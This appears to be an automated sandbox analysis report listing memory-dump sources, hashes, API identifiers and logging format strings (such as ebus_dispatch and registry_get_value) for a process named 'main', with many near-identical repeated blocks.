                                                                                                                                                  • Opcode Fuzzy Hash: f8d29101610d8f76ac1ed4feefd51e892c0e55ef3eadb0d75f62bac78426d285
                                                                                                                                                  • Instruction Fuzzy Hash: D5216D32A09AC286EB228F19F85016967A4FB44BD4F548135DF8E477A8DF3CE881E700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B918EEF1
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8B918EEEA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: 6ceb723587c1d552a552b3ca08934bf7bc6d823551b69239d98c8e8180dbb2b5
                                                                                                                                                  • Instruction ID: 81c6790ab38e76af12fee2b21d678a56249cff04711593347faecb4257a60471
                                                                                                                                                  • Opcode Fuzzy Hash: 6ceb723587c1d552a552b3ca08934bf7bc6d823551b69239d98c8e8180dbb2b5
                                                                                                                                                  • Instruction Fuzzy Hash: 53212C32A08AC282E755DF19E88017867A4FB45BD4B544135DB9D87768DF3CE945E700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8BFB89ACA
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BFB89AD1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: 5f07f7dd6c7a8ca443123c93aa7333b3264cb797661900b59e1563f9beebcf4d
                                                                                                                                                  • Instruction ID: dc023329bf1bd25f25b0379eca4aa750102418e81bad979789e348e1a7740482
                                                                                                                                                  • Opcode Fuzzy Hash: 5f07f7dd6c7a8ca443123c93aa7333b3264cb797661900b59e1563f9beebcf4d
                                                                                                                                                  • Instruction Fuzzy Hash: 36214F32A18A4685EB148F9DE88016977A0FB84FD8F548135DF8D47BA8DF3CD841C700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
                                                                                                                                                  • Instruction ID: 72424358975d12ac6c16a1493a684aaebbb0f0c82187ee8eb3da9ca974babeee
                                                                                                                                                  • Opcode Fuzzy Hash: 32b159213577b3bd10ca3da26adaf1b043a79799695e5198cb6d2c401548963a
                                                                                                                                                  • Instruction Fuzzy Hash: 42F08227B0860302F9729A1CB851BB911516F68764E4D4532EF4D8F7C1EE3DA8A7D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
                                                                                                                                                  • Instruction ID: 10dac0d2e907328ef49c1ebb450a079539c014521aec220a3f34d1ccac45a83f
                                                                                                                                                  • Opcode Fuzzy Hash: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
                                                                                                                                                  • Instruction Fuzzy Hash: 16F08227B0860302F9729A1CB851BB911516F68765E4D4532EF4D8F7C1EE3DA8A7D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
                                                                                                                                                  • Instruction ID: 976ee17106ca19f52d58e5ff4c49550bd5ed7dccd7020a6ebe2cadd585bf0887
                                                                                                                                                  • Opcode Fuzzy Hash: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
                                                                                                                                                  • Instruction Fuzzy Hash: 78F08227B0860302F9729A1CB851BB911516F68764E4D4532EF5D8F7C1EE3DA8A7D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                                                                                                  • Instruction ID: 4ae5250ccc9fa443211308ce9d61bad0306ae04f20010c24151a2af6b8f8b3ee
                                                                                                                                                  • Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                                                                                                  • Instruction Fuzzy Hash: 22F08227B0860302F9729A0CB951BB911516F68764F494532EF598F2D1EE3DA8A7C300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                                                                                                  • Instruction ID: 4e55e071187cbdc7a60e37831e777e5b4e1ead889f6f0ce7235afdca68deaa92
                                                                                                                                                  • Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                                                                                                  • Instruction Fuzzy Hash: FDF08227B0860342F9729A0CB951BB911516F68764F494532EF4D8F2D1EE3DA8A7C300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                                                                                                  • Instruction ID: 90258c9353a4b218ad131c44c98bd254c6945d4ad3f33b282c6c31bd4e3a35f6
                                                                                                                                                  • Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                                                                                                  • Instruction Fuzzy Hash: E0F08227B0860302F9729A0CB951BB911516F68764F494532EF4D8F2D1EE3DA8A7C300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
• Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
• Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
• Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
• Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
• Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
